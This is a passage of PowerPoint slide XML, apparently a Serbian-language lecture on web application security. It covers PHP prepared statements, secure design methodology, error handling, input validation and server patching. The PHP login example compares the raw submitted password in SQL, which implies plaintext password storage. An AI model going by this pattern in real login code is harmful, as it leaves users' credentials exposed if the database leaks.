              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izraza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="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44634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5BBF2-D855-497E-BACD-FEA825A9A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Pripremljeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>izrazi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Prepared statements)…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D45A50-F3A4-4738-9103-96C911623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09A477-B9B2-406D-AB47-F5E8E9331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143000"/>
            <a:ext cx="8839200" cy="563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ECECE"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/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&lt;?php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$username = $_POST['username'];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$password = $_POST['password'];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Konekcija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sa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MySQL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bazom</a:t>
            </a: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= new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('localhost', 'user', 'password', 'world');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stmt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= $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-&gt;prepare("SELECT * FROM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korisnici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WHERE username = ? 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       AND password = ? LIMIT 1");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Vrednosti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promenjivih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se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šalju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na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u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upit</a:t>
            </a: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stmt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-&gt;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bind_param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('ss', $username, $password);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izvršavanje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upita</a:t>
            </a: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stmt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-&gt;execute();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if($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stmt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-&gt;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affected_rows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&gt; 0) {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//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korisnik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je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ulogovan</a:t>
            </a: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//...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zatvaranje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izraza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upita</a:t>
            </a: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stmt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-&gt;close();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef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1548935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54071-C3DD-4AF2-9FFC-DC3255186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r-Latn-RS" sz="3200" dirty="0" err="1"/>
              <a:t>Sigurnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="3200" dirty="0" err="1"/>
              <a:t>aplikacije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-CS" altLang="sr-Latn-RS" sz="3200" dirty="0"/>
              <a:t>…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582B3-A28B-4AF6-BD14-6FC5E0E11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4" y="1066800"/>
            <a:ext cx="7331075" cy="5075238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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imati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>uvijek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umu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dovoljno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> dobro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>aplikacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>radi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> ono </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>što</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>smo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zamislili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>već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da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bude</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>otporna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>na</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>napade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da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pravilno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>upravlja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>greškama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Dakle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sigurnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>aplikacije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>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uzimati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>obzir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ranim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>fazama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>razvoja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već</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>pri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>projektovanju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>napraviti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dobar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koncept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kojeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> se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pridržavati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tokom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>cijelog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>razvoja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Takav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koncept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>svakako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>,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sadržati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sledeću</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>metadologiju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bezbijednost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aplikativne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>arhitekture</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Upravljanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>greškama</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Filtriranje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validacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inputa</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Testiranje</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p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779013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F1315643-7ED8-471A-B022-C28C47E7AE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r-Latn-RS" sz="2800" dirty="0" err="1"/>
              <a:t>Bezbijednost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="2800" dirty="0" err="1"/>
              <a:t>aplikativne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="2800" dirty="0" err="1"/>
              <a:t>arhitekture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS" dirty="0"/>
          </a:p>
        </p:txBody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398B1470-77A7-416F-ACB2-8F6241F567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219200"/>
            <a:ext cx="7178675" cy="4922838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b="0" dirty="0" err="1"/>
              <a:t>Sigurnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>aplikacije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>zavisi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od </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>sigurnosti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>servera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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>kom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>nalazi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>.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b="0" dirty="0" err="1"/>
              <a:t>Ukoliko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>posjeduje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>zastareo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ranjiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>softver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>velika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>vjerovatnoća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da je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>aplikacija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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>serveru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>ugrožena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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>neki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>način</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>.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b="0" dirty="0" err="1"/>
              <a:t>Najbolje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>rješenje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>imati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>cjelokupnu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>kontrolu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>nad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>serverom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voditi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>računa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> o tome da je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>softver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>uvijek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="1" dirty="0"/>
              <a:t>up to date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>odnosno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>ažuriran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>.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b="0" dirty="0" err="1"/>
              <a:t>Ponekad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>dešava</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>iz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>finansijskih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>razloga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>nije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>moguće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u tom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>slučaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>nije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>rijetkost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> da se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>odabere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>zakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>hostinga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>na</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>nekom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>serveru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>.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b="0" dirty="0"/>
              <a:t>U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>takvom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>slučaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>treba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>birati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>provjerene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dirty="0" err="1"/>
              <a:t>kvalitetne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> hosting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>provajdere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>koji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>imaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>ozbiljan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>pristup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>bezbijednosti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>aplikativnog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>softvera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>, ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>uzdati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>previše</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>te</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>sisteme</a:t>
            </a:r>
            <a:r>
